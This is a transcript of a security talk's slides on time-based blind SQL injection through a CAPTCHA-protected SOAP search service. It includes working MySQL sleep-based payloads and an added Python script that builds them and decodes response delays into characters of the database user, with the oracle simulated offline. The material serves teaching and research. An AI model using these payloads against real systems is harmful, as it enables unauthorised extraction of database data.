time based captcha protected sql injection through soap-webservice
TRANSCRIPT
Time based captcha protected SQL injection through SOAP-webservice
Frans Rosén @fransrosen
detectify
Search + CAPTCHA
Search for Bobby: '
Search: '-sleep(5)-'
CAPTCHA…
https://twitter.com/offensive_image/status/751191306500734976
Me need
1. Do a clear PoC: get data
2. As few requests as possible
3. Find ALL the storefronts!
4. ???
5. PROFIT!!!
user()
'-sleep((ascii(substring(user(),1,1))-90)/2)-'
Measured delay 14 s: (14*2)+90 = 118, i.e. 'v'
Validate
'-(if(ascii(substring(user(),1,1))=117,sleep(3),1))-(if(ascii(substring(user(),1,1))=118,sleep(6),1))-(if(ascii(substring(user(),1,1))=119,sleep(9),1))-'
Delay of 6 s: the first character is 'v', confirmed
Down to the @ (position 21 of user())
'-sleep((ascii(substring(user(),21,1))-90)/2)-'
Host search
'-sleep((ascii(substring(user(),21,1))-46)*2)-'
0 s for a dot ('.' = 46); a digit d (ascii 48..57) sleeps (d-46)*2 = 2*digit+4 s, so digit = (T-4)/2, e.g. T = 8 s gives 2
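The payloads above are single instances of one technique: pick a base and a scale so that the sleep duration of one request encodes a whole character, then invert the arithmetic on the measured delay. The following script is an added example (not code from the slides or from Detectify) that generates those payloads for any position, decodes measured delays back into characters, and walks user() the way the slides do: lowercase username with base 90, then the host after the '@' with base 46. The user() value SAMPLE_USER is constructed, the sleep oracle is simulated locally so nothing is sent or actually sleeps, the assumption that a negative sleep() argument adds no delay is the script's own, and the host walk assumes an IP-literal host.

```python
"""Added example, not part of the Detectify slides: generate the single-request
time-based payloads shown above and decode measured delays back into characters.
The sleep oracle is simulated locally against a constructed user() value, so the
script runs offline; against a real target, `oracle` would send the payload
through the SOAP search call and time the response."""

# Constructed sample user() value (hypothetical; the real one is not on the slides).
SAMPLE_USER = "vwebstore_ro@10.20.30.4"


def build_linear_payload(pos, base, op, factor):
    """One character per request: seconds = (ascii(char) - base) op factor.

    base=90, op='/', factor=2 -> the slide's username payload, 'a'..'z' sleep 3.5..16 s
    base=46, op='*', factor=2 -> the slide's host payload, '.' sleeps 0 s, '0'..'9' 4..22 s
    """
    return f"'-sleep((ascii(substring(user(),{pos},1))-{base}){op}{factor})-'"


def decode_linear(seconds, base, op, factor):
    """Invert the payload; round() absorbs network jitter below half a step."""
    raw = seconds * factor if op == "/" else seconds / factor
    return chr(base + round(raw))


def build_confirm_payload(pos, candidates, step=3):
    """The slide's 'Validate' payload: candidate i sleeps step*(i+1) s, anything else 1."""
    parts = [f"(if(ascii(substring(user(),{pos},1))={ord(c)},sleep({step * (i + 1)}),1))"
             for i, c in enumerate(candidates)]
    return "'-" + "-".join(parts) + "-'"


def decode_confirm(seconds, candidates, step=3):
    """Map the measured delay back to the candidate, or None if nothing matched."""
    idx = round(seconds / step) - 1
    return candidates[idx] if 0 <= idx < len(candidates) else None


def simulate_sleep(user, pos, base, op, factor):
    """Stand-in for the real oracle: the delay MySQL would add for this payload.

    substring() past the end gives '' and ascii('') is 0, so the formula goes
    negative; we assume that yields no delay (how sleep() treats a negative
    argument varies between MySQL versions, so confirm it on the target).
    """
    code = ord(user[pos - 1]) if pos <= len(user) else 0
    raw = (code - base) / factor if op == "/" else (code - base) * factor
    return max(0.0, raw)


def extract_user(oracle, max_len=64):
    """Reproduce the slides' two-phase walk: username with base 90, host with base 46."""
    # Phase 1: username. Any char below 90 ('@', digits, uppercase) reads as 0 s,
    # so the first 0 s result is taken as the '@'. Confirm doubtful characters
    # with the if-based payload before trusting them.
    username, pos = "", 1
    while pos <= max_len:
        secs = oracle(pos, 90, "/", 2)
        if secs == 0:
            break
        username += decode_linear(secs, 90, "/", 2)
        pos += 1
    at_pos = pos
    # Phase 2: host after the '@'. With base 46 a dot and end-of-string both read
    # 0 s; an IP literal never has two dots in a row, so two consecutive 0 s
    # readings mark the end (assumes an IP-literal host; letters would sleep
    # over 100 s under this payload, so a hostname needs a different base).
    host, zeros, pos = "", 0, at_pos + 1
    while pos <= max_len:
        secs = oracle(pos, 46, "*", 2)
        zeros = zeros + 1 if secs == 0 else 0
        if zeros == 2:
            host = host[:-1]  # drop the '.' produced by the first end-of-string read
            break
        host += decode_linear(secs, 46, "*", 2)
        pos += 1
    return username, at_pos, host


if __name__ == "__main__":
    def oracle(pos, base, op, factor):
        return simulate_sleep(SAMPLE_USER, pos, base, op, factor)
    print(build_linear_payload(1, 90, "/", 2))
    print(build_confirm_payload(1, "uvw"))
    print(extract_user(oracle))
```

With the constructed value the walk costs one request per character of user() plus one confirmation request per doubtful character, which is the point when every request also costs a CAPTCHA solve. The base and scale are the tuning knobs: a larger scale separates adjacent characters more robustly against jitter at the price of longer sleeps, and a base below the lowest expected character keeps the arithmetic positive.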
Setup
Result
Other
https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf
SQL Injection Optimization and Obfuscation Techniques (Salgado, Black Hat USA 2013)
Thanks!
Frans Rosén (@fransrosen) – www.detectify.com